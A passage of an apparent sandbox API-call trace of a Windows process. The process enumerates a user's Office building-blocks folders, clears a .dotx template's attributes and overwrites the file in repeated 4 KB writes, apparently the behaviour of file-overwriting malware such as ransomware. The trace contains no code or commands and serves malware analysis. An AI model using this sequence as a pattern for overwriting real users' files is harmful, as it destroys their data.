ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0092.416] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7f8) returned 1 [0092.416] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23ea18) returned 1 [0092.416] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea58) returned 1 [0092.416] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x5af83960, ftLastWriteTime.dwHighDateTime=0x1cb8930, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0092.416] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x5af83960, ftLastWriteTime.dwHighDateTime=0x1cb8930, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0092.416] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e758) returned 1 [0092.416] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e978) returned 1 [0092.416] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea58) returned 1 [0092.416] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x5af83960, ftLastWriteTime.dwHighDateTime=0x1cb8930, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0092.416] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x5af83960, ftLastWriteTime.dwHighDateTime=0x1cb8930, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0092.416] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e758) returned 1 [0092.416] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e978) returned 1 [0092.417] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eaf8) returned 1 [0092.419] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28986bd0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x28986bd0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x28986bd0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0092.419] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28986bd0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x28986bd0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x28986bd0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0092.419] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28986bd0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x28986bd0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x28986bd0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 0 [0092.419] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7f8) returned 1 [0092.419] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23ea18) returned 1 [0092.419] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eaf8) returned 1 [0092.420] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28986bd0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x28986bd0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x28986bd0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0092.420] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28986bd0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x28986bd0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x28986bd0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0092.420] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0092.420] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7f8) returned 1 [0092.420] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23ea18) returned 1 [0092.420] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea58) returned 1 [0092.420] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28986bd0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x28986bd0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x28986bd0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0092.420] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28986bd0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x28986bd0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x28986bd0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="16", cAlternateFileName="")) returned 1 [0092.420] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28986bd0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x28986bd0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x28986bd0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="16", cAlternateFileName="")) returned 0 [0092.420] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e758) returned 1 [0092.420] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e978) returned 1 [0092.420] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea58) returned 1 [0092.421] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28986bd0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x28986bd0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x28986bd0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0092.421] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28986bd0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x28986bd0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x28986bd0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="16", cAlternateFileName="")) returned 1 [0092.421] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0092.421] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e758) returned 1 [0092.421] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e978) returned 1 [0092.421] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0092.421] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28986bd0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x28986bd0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x28986bd0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0092.421] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x28986bd0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x28986bd0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x72af9fb0, ftLastWriteTime.dwHighDateTime=0x1d70910, nFileSizeHigh=0x0, nFileSizeLow=0x388cc7, dwReserved0=0x0, dwReserved1=0x0, cFileName="Built-In Building Blocks.dotx", cAlternateFileName="BUILT-~1.DOT")) returned 1 [0092.421] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0092.421] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6b8) returned 1 [0092.421] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0092.422] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\Built-In Building Blocks.dotx", dwFileAttributes=0x80) returned 1 [0092.422] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e778) returned 1 [0092.422] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\Built-In Building Blocks.dotx" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\document building blocks\\1033\\16\\built-in building blocks.dotx"), fInfoLevelId=0x0, lpFileInformation=0x23d0c20 | out: lpFileInformation=0x23d0c20*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x28986bd0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x28986bd0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x72af9fb0, ftLastWriteTime.dwHighDateTime=0x1d70910, nFileSizeHigh=0x0, nFileSizeLow=0x388cc7)) returned 1 [0092.422] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e728) returned 1 [0092.780] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7c8) returned 1 [0092.781] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\Built-In Building Blocks.dotx" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\document building blocks\\1033\\16\\built-in building blocks.dotx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0092.781] GetFileType (hFile=0x250) returned 0x1 [0092.781] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e738) returned 1 [0092.781] GetFileType (hFile=0x250) returned 0x1 [0092.782] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.783] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.783] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.784] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.784] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.784] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.785] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.785] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.785] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.785] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.786] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.786] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.786] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.787] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.787] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.787] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.788] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.788] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.789] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.789] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.789] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.790] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.790] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.790] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.791] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.791] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.792] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.792] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.792] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.792] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.793] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.793] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.793] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.794] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.794] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.794] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.794] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.795] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.795] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.795] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.796] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.796] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.796] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.796] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.797] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8a8, lpOverlapped=0x0 | out: lpBuffer=0x23f9da0*, lpNumberOfBytesWritten=0x23e8a8*=0x1000, lpOverlapped=0x0) returned 1 [0092.797] WriteFile (in: hFile=0x250, lpBuffer=0x23f9da0*, nNumberOfBytesToWrite=0x1000, 